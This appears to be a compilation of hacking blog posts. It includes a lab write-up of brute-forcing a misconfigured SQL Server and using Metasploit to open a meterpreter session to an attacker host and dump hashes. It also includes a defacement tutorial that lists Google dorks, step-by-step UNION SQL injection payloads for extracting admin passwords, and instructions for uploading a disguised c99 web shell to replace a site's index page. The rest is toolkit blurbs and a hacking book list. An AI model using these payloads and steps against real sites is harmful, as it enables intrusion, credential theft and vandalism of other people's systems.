Hacking SQL 2014 CTP1 on Windows Server 2012 R2

I wanted to test out the tools to make sure there were not any new gotchas with the latest and greatest versions of MSSQL and Windows Server. At the heart of this hack is brute forcing a SQL Auth account. I didn’t expect Microsoft to come up with any additional ways to prevent a server from being misconfigured and allowing this attack. What I wasn’t so sure about is if Microsoft had come up with a way to A, prevent the payload from executing or B prevent the payload from dumping the password hashes.

Here is what we do.
1. find an instance
2. brute force an account
3. deliver a payload
4. use meterpreter to dump the hashes

Hacking_MSSQL

First up is to install SQL Server. We’ll want to install the database engine, which is the service we are going to exploit, and also the management tools to make it super easy to misconfigure. My previous setup used VMWare player for the SQL box which got a little hairy. Turns out VMWare takes a bit to support new Windows operating systems so Hyper-V was a good choice for this test.

install_SQL

Next up to bat is the boneheaded administrator. Scumbag DBA is going to do a few things to this box to make it super easy for us to deploy our hacker tools. Those misconfigurations include:

1. Local windows administrator service account
2. SQL Auth enabled
3. SQL User with an easy password and the sysadmin server role

misconfigs

Now that we’re ready to rock and roll I decided to use VMWare player for Kali Linux as my attacker machine. I was able to identify that Microsoft SQL Server was at the other end of port 1433 with nmap.

nmap_01

This did however trip a very important SQL Log entry. I’m not sure if this is new to SQL 2014 but someone should contact nmap :]

09/28/2013 09:05:18,Logon,Unknown,The login packet used to open the connection is structurally invalid; the connection has been closed. Please contact the vendor of the client library. [CLIENT: 10.10.10.104]
09/28/2013 09:05:18,Logon,Unknown,Error: 17832 Severity: 20 State: 18.

After using the brute force tool “hydra”, we have a identified a valid username and password of tom/tom. This generates some more log entries. No supprises here:

09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT: 10.10.10.104]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.

Now that we have a valid username and password we can use the metasploit framework to send our payload and attempt to retrieve the hashes. The commands to complete this are:

msfconsole
use exploit/windows/mssql/mssql_payload
set password tom
set username tom
set rhost 10.10.10.105
set lhost 10.10.10.100
exploit
getuid
ps
migrate 2136
hashdump
sysinfo

successful_hashes

Aaaaaaand we’ve got Build 9200 giving us the goods. Getting the hashes allows for lateral movement. All SQL servers on the same domain could very well be at risk now that one SQL Server has been taken advantage of. The key here is to avoid the misconfigurations on ALL servers.

This malicious activity does generate some more notable log activity. Notice that we never enabled xp_cmdshell, the delivery of the payload did that for us.

09/29/2013 09:27:22,spid55,Unknown,Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell' search for 'xp_cmdshell' in SQL Server Books Online.

This is a security test and demonstration for everyone who wants to secure their server and I hope this will help you to understand the risk and find the solution.

HOW TO DEFACE WEBSITES USING SQL AND PHP SCRIPTING

FIRST OF ALL YOU SHOULD KNOW WHAT IS DEFACEMENT??
Defacing a website simply means that we replace the index.html file of a site by our file. Now all the Users that open it will see our Page(i.e being uploaded by us).
For Defacing a website, three things that you need Most are:
1. SQL Injection(For analyzing website loops)
2. Admin Password
3. Shell Script (for getting Admin Controls)

Now Lets Start the Tutorial:
First of all I would Like to say that I have took some part of SQL injection Tutorial from my previous posts and a site http://www.milw0rm.com/ .Most of the Part is written by me so if you have any doubts I will clear them….

1. Finding the Target and the Admin Password
First of all we must find out our target website. I have collected a lot of dorks i.e the vulnerability points of the websites. Some Google Searches can be awesomely utilized to find out vulnerable Websites.. Below is example of some queries..
Examples: Open the Google and copy paste these queries…
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=

Here are some More Queries (use them without quotation marks)..

“add.asp?bookid=”
“add_cart.asp?num=”
“addcart.asp?”
“addItem.asp”
“add-to-cart.asp?ID=”
“addToCart.asp?idProduct=”
“addtomylist.asp?ProdId=”
“adminEditProductFields.asp?intProdID=”
“advSearch_h.asp?idCategory=”
“affiliate.asp?ID=”
“affiliate-agreement.cfm?storeid=”
“affiliates.asp?id=”
“ancillary.asp?ID=”
“archive.asp?id=”
“article.asp?id=”
“aspx?PageID”
“basket.asp?id=”
“Book.asp?bookID=”
“book_list.asp?bookid=”
“book_view.asp?bookid=”
“BookDetails.asp?ID=”
“browse.asp?catid=”
“browse_item_details.asp”
“Browse_Item_Details.asp?Store_Id=”
“buy.asp?”
“buy.asp?bookid=”
“bycategory.asp?id=”
“cardinfo.asp?card=”
“cart.asp?action=”
“cart.asp?cart_id=”
“cart.asp?id=”
“cart_additem.asp?id=”
“cart_validate.asp?id=”
“cartadd.asp?id=”
“cat.asp?iCat=”
“catalog.asp”
“catalog.asp?CatalogID=”
“catalog_item.asp?ID=”
“catalog_main.asp?catid=”
“category.asp”
“category.asp?catid=”
“category_list.asp?id=”
“categorydisplay.asp?catid=”
“checkout.asp?cartid=”
“checkout.asp?UserID=”
“checkout_confirmed.asp?order_id=”
“checkout1.asp?cartid=”
“comersus_listCategoriesAndProducts.asp?idCategory =”
“comersus_optEmailToFriendForm.asp?idProduct=”
“comersus_optReviewReadExec.asp?idProduct=”
“comersus_viewItem.asp?idProduct=”
“comments_form.asp?ID=”
“contact.asp?cartId=”
“content.asp?id=”
“customerService.asp?TextID1=”
“default.asp?catID=”
“description.asp?bookid=”
“details.asp?BookID=”
“details.asp?Press_Release_ID=”
“details.asp?Product_ID=”
“details.asp?Service_ID=”
“display_item.asp?id=”
“displayproducts.asp”
“downloadTrial.asp?intProdID=”
“emailproduct.asp?itemid=”
“emailToFriend.asp?idProduct=”
“events.asp?ID=”
“faq.asp?cartID=”
“faq_list.asp?id=”
“faqs.asp?id=”
“feedback.asp?title=”
“freedownload.asp?bookid=”
“fullDisplay.asp?item=”
“getbook.asp?bookid=”
“GetItems.asp?itemid=”
“giftDetail.asp?id=”
“help.asp?CartId=”
“home.asp?id=”
“index.asp?cart=”
“index.asp?cartID=”
“index.asp?ID=”
“info.asp?ID=”
“item.asp?eid=”
“item.asp?item_id=”
“item.asp?itemid=”
“item.asp?model=”
“item.asp?prodtype=”
“item.asp?shopcd=”
“item_details.asp?catid=”
“item_list.asp?maingroup”
“item_show.asp?code_no=”
“itemDesc.asp?CartId=”
“itemdetail.asp?item=”
“itemdetails.asp?catalogid=”
“learnmore.asp?cartID=”
“links.asp?catid=”
“list.asp?bookid=”
“List.asp?CatID=”
“listcategoriesandproducts.asp?idCategory=”
“modline.asp?id=”
“myaccount.asp?catid=”
“news.asp?id=”
“order.asp?BookID=”
“order.asp?id=”
“order.asp?item_ID=”
“OrderForm.asp?Cart=”
“page.asp?PartID=”
“payment.asp?CartID=”
“pdetail.asp?item_id=”
“powersearch.asp?CartId=”
“price.asp”
“privacy.asp?cartID=”
“prodbycat.asp?intCatalogID=”
“prodetails.asp?prodid=”
“prodlist.asp?catid=”
“product.asp?bookID=”
“product.asp?intProdID=”
“product_info.asp?item_id=”
“productDetails.asp?idProduct=”
“productDisplay.asp”
“productinfo.asp?item=”
“productlist.asp?ViewType=Category&CategoryID= ”
“productpage.asp”
“products.asp?ID=”
“products.asp?keyword=”
“products_category.asp?CategoryID=”
“products_detail.asp?CategoryID=”
“productsByCategory.asp?intCatalogID=”
“prodView.asp?idProduct=”
“promo.asp?id=”
“promotion.asp?catid=”
“pview.asp?Item=”
“resellers.asp?idCategory=”
“results.asp?cat=”
“savecart.asp?CartId=”
“search.asp?CartID=”
“searchcat.asp?search_id=”
“Select_Item.asp?id=”
“Services.asp?ID=”
“shippinginfo.asp?CartId=”
“shop.asp?a=”
“shop.asp?action=”
“shop.asp?bookid=”
“shop.asp?cartID=”
“shop_details.asp?prodid=”
“shopaddtocart.asp”
“shopaddtocart.asp?catalogid=”
“shopbasket.asp?bookid=”
“shopbycategory.asp?catid=”
“shopcart.asp?title=”
“shopcreatorder.asp”
“shopcurrency.asp?cid=”
“shopdc.asp?bookid=”
“shopdisplaycategories.asp”
“shopdisplayproduct.asp?catalogid=”
“shopdisplayproducts.asp”
“shopexd.asp”
“shopexd.asp?catalogid=”
“shopping_basket.asp?cartID=”
“shopprojectlogin.asp”
“shopquery.asp?catalogid=”
“shopremoveitem.asp?cartid=”
“shopreviewadd.asp?id=”
“shopreviewlist.asp?id=”
“ShopSearch.asp?CategoryID=”
“shoptellafriend.asp?id=”
“shopthanks.asp”
“shopwelcome.asp?title=”
“show_item.asp?id=”
“show_item_details.asp?item_id=”
“showbook.asp?bookid=”
“showStore.asp?catID=”
“shprodde.asp?SKU=”
“specials.asp?id=”
“store.asp?id=”
“store_bycat.asp?id=”
“store_listing.asp?id=”
“Store_ViewProducts.asp?Cat=”
“store-details.asp?id=”
“storefront.asp?id=”
“storefronts.asp?title=”
“storeitem.asp?item=”
“StoreRedirect.asp?ID=”
“subcategories.asp?id=”
“tek9.asp?”
“template.asp?Action=Item&pid=”
“topic.asp?ID=”
“tuangou.asp?bookid=”
“type.asp?iType=”
“updatebasket.asp?bookid=”
“updates.asp?ID=”
“view.asp?cid=”
“view_cart.asp?title=”
“view_detail.asp?ID=”
“viewcart.asp?CartId=”
“viewCart.asp?userID=”
“viewCat_h.asp?idCategory=”
“viewevent.asp?EventID=”
“viewitem.asp?recor=”
“viewPrd.asp?idcategory=”
“ViewProduct.asp?misc=”
“voteList.asp?item_ID=”
“whatsnew.asp?idCategory=”
“WsAncillary.asp?ID

Now The Admin password Hacking procedure starts:

You can also refer to my previous post of hacking websites:

Hacking websites : How to hack websites By using SQL Injection

1). Check for vulnerability

Let’s say that we have some site like this

http://www.site.com/news.php?id=5

Now to test if is vulrnable we add to the end of url ‘ (quote),

and that would be http://www.site.com/news.php?id=5’

so if we get some error like
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
or something similar that means the Site is vulnerable to SQL injection.

2). Find the number of columns

To find number of columns we use statement ORDER BY (tells database how to order the result) so how to use it? Well just incrementing the number until we get an error.

http://www.site.com/news.php?id=5 order by 1/* <– no error

http://www.site.com/news.php?id=5 order by 2/* <– no error

http://www.site.com/news.php?id=5 order by 3/* <– no error

http://www.site.com/news.php?id=5 order by 4/* <– error (we get message like this Unknown column '4' in 'order clause' or something like that)

that means that the it has 3 columns, cause we got an error on 4.

3). Check for UNION function

With union we can select more data in one sql statement.

So we have

http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found that number of columns are 3 in section 2). )

if we see some numbers on screen, i.e 1 or 2 or 3 then the UNION works .

4). Check for MySQL version

http://www.site.com/news.php?id=5 union all select 1,2,3/* NOTE: if /* not working or you get some error, then try —
it's a comment and it's important for our query to work properly.

Let say that we have number 2 on the screen, now to check for version
we replace the number 2 with @@version or version() and get someting like 4.1.33-log or 5.0.45 or similar.

it should look like this http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) …"

I didn't see any paper covering this problem, so i must write it .

What we need is convert() function

i.e.

http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.

http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .

5). Getting table and column name

well if the MySQL version is < 5 (i.e 4.1.33, 4.1.12…) 5 version.
we must guess table and column name in most cases.

common table names are: user/s, admin/s, member/s …

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc…

i.e would be

http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that’s good )

We know that table admin exists…

Now to check column names.

http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc…

now to check if column password exists

http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

we seen password on the screen in hash or plain-text, it depends of how the database is set up
i.e md5 hash, mysql hash, sha1…

Now we must complete query to look nice

For that we can use concat() function (it joins strings)

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*

Note that i put 0x3a, its hex value for : (so 0x3a is hex value for colon)

(there is another way for that, char(58), ascii value for : )

http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*

Now we get dislayed username:password on screen, i.e admin:admin or admin:somehash

When you have this, you can login like admin or some superuser.

If can’t guess the right table name, you can always try mysql.user (default)

It has user password columns, so example would be

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like i said before i’m gonna explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

here we replace the our number 2 with table_name to get the first table from information_schema.tables

displayed on the screen. Now we must add LIMIT to the end of query to list out all tables.

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*

note that i put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*

the second table is displayed.

for third table we put limit 2,1

i.e

http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get some useful like db_admin, poll_user, auth, auth_user etc…

To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*

The first column is diplayed.

The second one (we change limit 0,1 to limit 1,1)

ie.

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc…

If you wanna display column names for specific table use this query. (where clause)

Let’s say that we found table users.

i.e

http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name=’users’/*

Now we get displayed column name in table users. Just using LIMIT we can list all columns in table users.

Note that this won’t work if the magic quotes is ON.

Let’s say that we found colums user, pass and email.

Now to complete query to put them all together.

For that we use concat() , i decribe it earlier.

i.e

http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com

** If you are too lazy for doing above stuff you can use tools they will do all the job:

1) Exploit scanner (this will find vulnerable websites)
Code:
http://rapidshare.com/files/24802790…oitscanner.zip

2) SQLi helpper (this tool will do all the injecting job and get you the pass or hash)
Code:
http://rapidshare.com/files/24802907…elperV.2.7.rar

*** use the tools only if you are new to hacking. Do it manually thats the thrill and that is real hacking. When you do it manually you will understand the concept.

In some websites you can directly see the password but most of the websites encrypt them using MD5. so u hav to crack the hash to get the password.

To crack the password there are three ways
1) Check the net whether this hash is cracked before:
Download:
http://www.md5decrypter.co.uk

2) Crack the password with the help of a site:
Download::
http://www.milw0rm.com/cracker/insert.php

http://passcracking.com/index.php

3) Use a MD5 cracking software:
Download:
http://rapidshare.com/files/13696796…CF_2.10_2b.rar

Password = OwlsNest

2) DEFACING THE WEBSITE

After getting the password you can login as the admin of the site. But first you have to find the admin login page for the site. there r three methods to find the admin panel.

1) You can use an admin finder website:
Code:
http://4dm1n.houbysoft.com/

2) You can use an admin finder software:

Code:
http://rapidshare.com/files/248020485/adminfinder.rar

After logging in as the admin you can upload photos to the site. so now you are going to upload a shell into the site using this upload facility.

Dowload the shell here:
http://rapidshare.com/files/248023722/c99.rar

Extract it you will get a c99.php upload it.
Some sites wont allow you to upload a php file. so rename it as c99.php.gif
Then upload it.

After that go to http://www.site.com/images (in most sites images are saved in this dir but if you cant find c99 there then you have to guess the dir)

find the c99.php.gif and click it..

Now you can see a big control pannel….
Now you can do what ever you want to do…
Search for the index.html file and replace it with your own file.
So if any one goes to that site they will see your page….

After Doing This click on Logout and You are Done..

Network Security Toolkit (NST)

Welcome to the Network Security Toolkit (NST). This bootable ISO live CD/DVD (NST Live) is based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms.

The main intent of developing this toolkit was to provide the security professional and network administrator with a comprehensive set of Open Source Network Security Tools. The majority of tools published in the article: Top 125 Security Tools by INSECURE.ORG are available in the toolkit. An advanced Web User Interface (WUI) is provided for system/network administration, navigation, automation, network monitoring, host geolocation, network analysis and configuration of many network and security applications found within the NSTdistribution. In the virtual world, NST can be used as a network security analysis validation and monitoring tool on enterprise virtual servers hosting virtual machines.

Release Features: NST 20 SVN:5663

2014-Feb-20We are pleased to announce the latest NST release: “NST 20 SVN:5663“. This release is based on Fedora 20 using Linux Kernel: “3.13.3-201.fc20“. Significant effort has been devoted to bringing this release on par with Fedora 20. Starting with NST 20, the “Mate” Desktop is now the preferred desktop.

Here are some of the highlights for this release:

 

SANS Investigate Forensic Toolkit (SIFT)

SANS Investigate Forensic Toolkit (SIFT) Workstation Version 3.0

  

Download SIFT Workstation VMware Appliance Now – 1.5 GB

Having trouble downloading?
If you are having trouble downloading the SIFT Kit please contact sift-support@sans.org and include the URL you were given, your IP address, browser type, and if you are using a proxy of any kind.

Having trouble with SIFT 3?
If you are experiencing errors in SIFT 3 itself, please submit errors, bugs, and recommended updates here: https://github.com/sans-dfir/sift/issues

List of Internet Security and hacking Books

This is a list of recommended (non-fiction) books about hackers and hacking which involve real life descriptions of events, and the personalities involved. Although solely my own opinion, I have read most of these titles and stand by this ordering, but of course feel free to post comments of your alternative suggestions here. Enjoy!

  1. Ghost in the Wires: My Adventures as the World’s Most Wanted Hacker
    By Kevin Mitnick, Steve Wozniak and William L. Simon
    Publisher: Little, Brown and Company
    Published: August 15, 2011
    Amazon Link: 
    here

    Kevin Mitnick was the most elusive computer break-in artist in history. He accessed computers and networks at the world’s biggest companies–and however fast the authorities were, Mitnick was faster, sprinting through phone switches, computer systems, and cellular networks. He spent years skipping through cyberspace, always three steps ahead and labeled unstoppable. But for Kevin, hacking wasn’t just about technological feats-it was an old fashioned confidence game that required guile and deception to trick the unwitting out of valuable information. Driven by a powerful urge to accomplish the impossible, Mitnick bypassed security systems and blazed into major organizations including Motorola, Sun Microsystems, and Pacific Bell. But as the FBI’s net began to tighten, Kevin went on the run, engaging in an increasingly sophisticated cat and mouse game that led through false identities, a host of cities, plenty of close shaves, and an ultimate showdown with the Feds, who would stop at nothing to bring him down. Ghost in the Wires is a thrilling true story of intrigue, suspense, and unbelievable escape, and a portrait of a visionary whose creativity, skills, and persistence forced the authorities to rethink the way they pursued him, inspiring ripples that brought permanent changes in the way people and companies protect their most sensitive information.

  2. Kingpin: How One Hacker Took Over the Billion-Dollar Cybercrime Underground
    By Kevin Poulsen
    Publisher: Crown
    Published: February 22, 2011
    Amazon Link: 
    here

    A true page turning account of the exploits of Max Butler, a.k.a. Max Ray Vision, a notorious hacker who stole access to 1.8 million credit card accounts before law enforcement caught up with him. Kingpin gives us not just the personalities and double-dealing of this new underground, but also a look at how hacking has transformed the world of crime. It details the seesaw life of Butler, at one time a respected computer security professional, and next a pure criminal, hacking into credit card payment systems and handing off millions of credit card numbers to other criminals worldwide, via underground ‘carders’ websites.

  3. The Cuckoo’s Egg: Tracking a Spy Through the Maze of Computer Espionage
    By Cliff Stoll
    Publisher: Gallery Books
    Published: September 13, 2005. Originally published in 1985.
    Amazon Link: 
    here

    A 75-cent discrepancy in billing for computer time led Stoll, an astrophysicist working as a systems manager at a California laboratory, on a quest that reads with the tension and excitement of a fictional thriller. Painstakingly he tracked down a hacker who was attempting to access American computer networks, in particular those involved with national security, and actually reached into an estimated 30 of the 450 systems he attacked. Initially Stroll waged a lone battle, his employers begrudging him the time spent on his search and several government agencies refused to cooperate. But his diligence paid off and in due course it was learned that the hacker, 25-year-old Markus Hess of Hanover, Germany, was involved with a spy ring. Eight members were arrested by the West German authorities but all but one were eventually released. Although the book will be best appreciated by the computer literate, even illiterates should be able to follow the technical complexities with little difficulty.

  4. The Fugitive Game: Online with Kevin Mitnick
    By Jonathan Littman
    Publisher: Little, Brown and Company
    Published: January 1, 1997
    Amazon Link: 
    here

    The Fugitive Game is a compelling look at the events that led up to the capture of Kevin Mitnick, and no portion of the folklore surrounding the case is left untouched by the book’s critical eye. The real gold of this volume comes from the nearly 200 pages of conversations with Kevin Mitnick himself, most of which were transcribed while he was fleeing from the law. John Markoff’s involvement in the eventual capture of Mitnick by Tsutomu Shimomura is also scrutinized at length. A must read companion to “Ghost in the Wires”.

  5. Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet
    By Joseph Menn
    Publisher: PublicAffairs
    Published: January 26, 2010
    Amazon Link: 
    here

    Joseph Menn immerses us in the personalities and politics behind today’s cybersecurity threats and countermeasures. This balanced, compelling account shows why the future of the Internet depends more on people of good will than on some technological magic bullet. The book describes the efforts of Barrett Lyon, a California surfer self-taught to become one of the world’s leading Internet security experts, and Andy Crocker, a courageous British policeman, and their collaborative work to identify the criminals responsible for the now all-too-familiar viruses, worms, Trojans, and denial-of-service attacks that have infiltrated millions of computers and disabled thousands of Web sites.

  6. The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers
    By Kevin Mitnick and William L. Simon
    Publisher: Wiley
    Published: December 27, 2005
    Amazon Link: 
    here

    Mitnick introduces readers to a fascinating array of pseudonymous hackers. One group of friends bilks Las Vegas casinos out of more than a million dollars by mastering the patterns inherent in slot machines; another fellow, less fortunate, gets mixed up with a presumed al-Qaeda–style terrorist; and a prison convict leverages his computer skills to communicate with the outside world, unbeknownst to his keepers. Mitnick’s handling of these engrossing tales is exemplary, for which credit presumably goes to his coauthor, writing pro Simon. Given the complexity of the material, the authors avoid the pitfall of drowning readers in minutiae. Uniformly readable, the stories—some are quite exciting—will impart familiar lessons to security pros while introducing lay readers to an enthralling field of inquiry.

  7. The Hacker Crackdown: Law And Disorder On The Electronic Frontier
    By Bruce Sterling
    Publisher: Bantam
    Published: November 1, 1993
    Amazon Link: 
    here

    Bruce Sterling’s classic work highlights the 1990 assault on hackers, when law-enforcement officials successfully arrested scores of suspected illicit hackers and other computer-based law-breakers. These raids became symbolic of the debate between fighting serious computer crime and protecting civil liberties. However, The Hacker Crackdown is about far more than a series of police sting operations. It’s a lively tour of three cyberspace subcultures–the hacker underworld, the realm of the cybercops, and the idealistic culture of the cybercivil libertarians.

  8. The Watchman: The Twisted Life and Crimes of Serial Hacker Kevin Poulsen
    By Jonathan Littman
    Publisher: Little, Brown and Company
    Published: March 31, 1997
    Amazon Link: 
    here

    Takes us inside the mind of former computer hacker and now respected author, Kevin Poulsen. In his previous life as a hacker, he seized the phone lines of a major Los Angeles radio station to make certain he was the 101st caller. Over time, he won two Porsches, $22,000 in cash, and two trips to Hawaii. He was caught and charged with numerous computer and telephone crimes, the most serious of which alleged that he obtained a classified document from a military database. Poulsen became the first computer hacker in history to be charged with espionage, and in all he was charged with 19 counts of computer fraud, wiretapping, money laundering, and obstruction of justice.

  9. Masters of Deception: The Gang That Ruled Cyberspace
    By Michele Slatalla
    Publisher: Harper Perennial
    Published: December 1, 1995
    Amazon Link: 
    here

    A riveting account of electronic gang warfare and computer crimes by two rival bands of hackers. One group of brainy teens based in New York City and calling themselves Masters of Deception (MOD) downloaded confidential credit histories (including those of Geraldo Rivera and Julia Roberts), broke into AT&T’s computer system and stole credit-card numbers. Their arch rivals, the Texas-based Legion of Doom (LOD), launched a security service firm to assist corporations whose computers MOD has penetrated. The events leading up to the conflict and its climax make for some great reading.

  10. Unmasked
    By Peter Bright, Nate Anderson, Jacqui Cheng, Eric Bangeman and Aurich Lawson (of ArsTechnica)
    Publisher: Amazon Digital Services (Kindle Edition)
    Published: March, 2011
    Amazon Link: 
    here

    ArsTechnica does a fantastic job of chronicling the Anonymous/HBGary saga over the course of a number of articles. Every piece is well written, detailed, and informative. If you have any interest in the impact an anonymous collection of individuals can have, or the types of organizations the US government contracts with, you owe it to yourself to read this book.

Below I’ve listed some books that I feel deserve a mention, including the recently released titles “DarkMarket” by Misha Glenny and “A Bug Hunter’s Diary” by Tobias Klein.

> DarkMarket: Cyberthieves, Cybercops and You
By Misha Glenny
Publisher: Knopf
Published: October 4, 2011
Amazon Link: 
here

Misha Glenny (author of organised crime book “McMafia”), explores the three fundamental threats facing us in the twenty-first century: cybercrime, cyberwarfare and cyberindustrial espionage. Glenny travelled from the U.S. to Ukraine, via France, Germany and Turkey following the players associated with cybercrime, including those associated with the underground carders website DarkMarket. Interviews feature the criminals, the geeks, the police, the security experts and the victims.

> CYBERPUNK: Outlaws and Hackers on the Computer Frontier, Revised Edition
By Katie Hafner
Publisher: Simon & Schuster
Published: November 1, 1995
Amazon Link: 
here

Cyberpunk tells the stories of notorious hackers Kevin Mitnick, Robert T. Morris, and the Berlin-based Chaos Computer Club. The story of Morris, who became infamous for unleashing a crippling worm that brought the Internet to a grinding standstill, is still as relevant and ominous today as it was at the time. The space devoted to Mitnick is a must-read companion to either “Ghost in the Wires” or “The Fugitive Game”. Included also is CCC’s “Pengo and the Project Equalizer,” the story of a West Berlin punk turned hacker, a true cyberpunk of the title.

> A Bug Hunter’s Diary: A Guided Tour Through the Wilds of Software Security
By Tobias Klein
Publisher: No Starch Press
Published: October 22, 2011
Amazon Link: 
here

Follow along with security expert Tobias Klein as he tracks down and exploits bugs in some of the world’s most popular programs. Whether by browsing source code, poring over disassembly, or fuzzing live programs, readers get an over-the-shoulder glimpse into the world of a bug hunter as Klein unearths security flaws and uses them to take control of affected systems. They also learn how the developers responsible for these flaws responded to Klein’s discoveries—or didn’t seem to respond at all. In this one-of-a-kind guide that mixes the personal with the deeply technical, readers learn how hackers approach difficult problems, see the fallout of a security advisory, and understand the true joys (and frustrations) of bug hunting.

> Underground: Tales of Hacking, Madness and Obsession on the Electronic Frontier
By Suelette Dreyfus
Publisher: Mandarin Australia
Published: June 6, 1997
Amazon Link: 
here

Underground provides an excellent overview of intrusion activities focusing on the UK, Australia, and the United States from the late 80’s to the early 90’s, with stories on incidents such as the WANK Worm outbreak and 8lgm’s activities. The stand out attribute of this book is that it examines what happened to the intruders after their activity rather than focusing on the activity itself. WikiLeaks founder, Julian Assange, famously helped with research for this book.

 

I have created another list as well.

  1. Hacking The Windows Registry.pdf
  2. Hugo Cornwall – The Hacker’s Handbook .pdf
  3. Hacking into computer systems – a beginners guide.pdf
  4. Hacking_IIS_Servers.pdf
  5. Addison-Wesley Professional.Honeypots- Tracking Hackers.pdf
  6. Wiley.The Database Hacker’s Handbook- Defending Database Servers.chm
  7. John Wiley &amp_ Sons.Hacking GMail (ExtremeTech).pdf
  8. Hacking.Guide.V3.1.pdf
  9. A-List Publishing.Hacker Linux Uncovered.chm
  10. Hacker’S.Delight.chm
  11. Hacker.Bibel.pdf
  12. HackerHighSchool.pdf
  13. Hacker’s Desk Reference.pdf
  14. A Beginners Guide To Hacking Computer Systems.pdf
  15. Addison Wesley – Hackers Delight 2002.pdf
  16. addison wesley – web hacking – attacks and defense.chm
  17. Addison Wesley, The Outlook Answer Book Useful Tips Tricks And Hacks (2005) Bbl Lotb.chm
  18. amazon-hacks.chm
  19. Anti-Hacker ToolKit – McGraw Hill 2E 2004.chm
  20. Attacking the DNS Protocol.pdf
  21. Auerbach.Practical.Hacking.Techniques.and.Countermeasures.Nov.2006.pdf
  22. Auerbach.Pub.The.Hackers.Handbook.The.Strategy.Behind.Breaking.into.and.Defending.Networks.Nov.20.pdf
  23. bsd-hacks.pdf
  24. ceh-official-certified-ethical-hacker-review-guide-exam-312-50.9780782144376.27422.pdf
  25. Certified Ethical Hacker (CEH) v3.0 Official Course.pdf
  26. Computer – Hackers Secrets – e-book.pdf
  27. cracking-sql-passwords.pdf
  28. Crc Press – The Hacker’S Handbook.pdf
  29. Credit.Card.Visa.Hack.Ucam.Cl.Tr.560.pdf
  30. DangerousGoogle-SearchingForSecrets.pdf
  31. database hacker handbook.chm
  32. Dummies – Hack How To Create Keygens (1).pdf
  33. ebay-hacks-100-industrial-strength-tips-and-tools.pdf
  34. ebook.oreilly.-.windows.xp.hacks.sharereactor.chm
  35. eBooks.OReilly.-.Wireless.Hacks.100.Industrial.-.Strength.Tips.and.Tools.chm
  36. ethical hacking, student guide.pdf
  37. excel-hacks.chm
  38. For.Dummies.Hacking.for.Dummies.Apr.2004.eBook-DDU.pdf
  39. For.Dummies.Hacking.Wireless.Networks.For.Dummies.Sep.2005.eBook-DDU.pdf
  40. google-hacks.pdf
  41. Google Earth for Dummies.pdf
  42. Hack IT Security Through Penetration Testing.pdf
  43. Hack Proofing – Your Network – Internet Tradecraft.pdf
  44. Hack Proofing Linux A Guide to Open Source Security – Stangler, Lane – Syngress – ISBN 1-928994-34-2.pdf
  45. Hack Proofing Sun Solaris 8.pdf
  46. Hack Proofing Your E-Commerce Site.pdf
  47. Hack Proofing Your Identity In The Information Age.pdf
  48. Hack Proofing Your Network Second Edition.pdf
  49. Hack Proofing Your Network_First Edition.pdf
  50. Hack Proofing Your Web Applications.pdf
